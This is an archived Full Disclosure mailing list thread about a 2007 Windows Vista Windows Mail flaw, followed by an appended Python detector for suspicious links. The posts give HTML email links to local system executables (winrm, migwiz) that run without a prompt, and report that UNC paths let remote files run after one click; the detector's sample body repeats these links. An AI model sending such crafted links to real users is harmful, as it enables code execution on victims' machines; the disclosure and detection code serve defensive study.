Full Disclosure mailing list archives

Re: Microsoft Windows Vista - Windows Mail Client Side Code Execution Vulnerability


From: "Kingcope" <kingcope () gmx net>
Date: Fri, 23 Mar 2007 11:32:07 +0100

Hello,

I just tested it with UNC paths,
and yes this works too, but you have to
press on the yes button when it asks because
the file is not authorized (it comes from remote).
After pressing Yes one time it gets executed.
Normally Windows Mail does not execute
exe or other executable files, now it does :-)


Thank you for this nice idea Joxean Koret.



Regards,

kcope

----- Original Message ----- 
From: "Joxean Koret" <joxeankoret () yahoo es>
To: <full-disclosure () lists grok org uk>; <kingcope () gmx net>
Sent: Friday, March 23, 2007 11:15 AM
Subject: RE: [Full-disclosure] Microsoft Windows Vista - Windows Mail Client 
Side Code Execution Vulnerability


Hi,

Did you test it using UNC paths? It may be a way to
truly execute arbitrary code.

Regards,
Joxean Koret

Exploit:
Send an HTML email message containing the URL:
<a href="c:/windows/system32/winrm?">Click here!</a>
or
<a href="c:/windows/system32/migwiz?">Click here!</a>
and winrm.cmd/migwiz.exe gets executed without asking
for permission.
These are just examples.

I could not pass arguments to winrm (hehe this would
be beautiful), but I guess there
are several attack vectors.



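A mail gateway or triage script can flag the link forms discussed in this thread (drive-letter paths and UNC paths in an `href`) before a message reaches the client. The Python below is an added example, not part of the original posts; the function names, the extra `file:` scheme check, the UNC host name and the sample body are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# Link targets that name a file system location rather than a web resource.
LOCAL_PATTERNS = [
    ("drive-path", re.compile(r"^[a-z]:[\\/]", re.I)),   # c:/windows/system32/winrm?
    ("unc-path", re.compile(r"^(?:\\\\|//)[^\\/]")),      # \\host\share\file or //host/share
    ("file-url", re.compile(r"^file:", re.I)),            # file://host/share/file
]

def classify_href(href):
    """Return the matching category name, or None for an ordinary link."""
    target = unquote(href or "").strip()  # undo %-encoding before matching
    for name, pattern in LOCAL_PATTERNS:
        if pattern.match(target):
            return name
    return None

class _HrefCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for key, value in attrs:
            if key == "href":
                kind = classify_href(value)
                if kind:
                    self.findings.append((kind, value))

def find_local_links(html_body):
    """List (category, href) for each href that points at a local or UNC path."""
    collector = _HrefCollector()
    collector.feed(html_body)
    collector.close()
    return collector.findings

# Constructed sample body: the two links quoted in the post, one UNC link with a
# placeholder host, and one ordinary web link that must not be flagged.
SAMPLE_BODY = r'''
<a href="c:/windows/system32/winrm?">Click here!</a>
<a href="c:/windows/system32/migwiz?">Click here!</a>
<a href="\\fileserver.example\share\tool">Click here!</a>
<a href="https://www.example.com/c:/notes">Docs</a>
'''

if __name__ == "__main__":
    for kind, href in find_local_links(SAMPLE_BODY):
        print(f"{kind:10} {href}")
```

A hit is a reason to rewrite or strip the link, or to quarantine the message, since a legitimate HTML mail has no need to link to a path on the recipient's own disk.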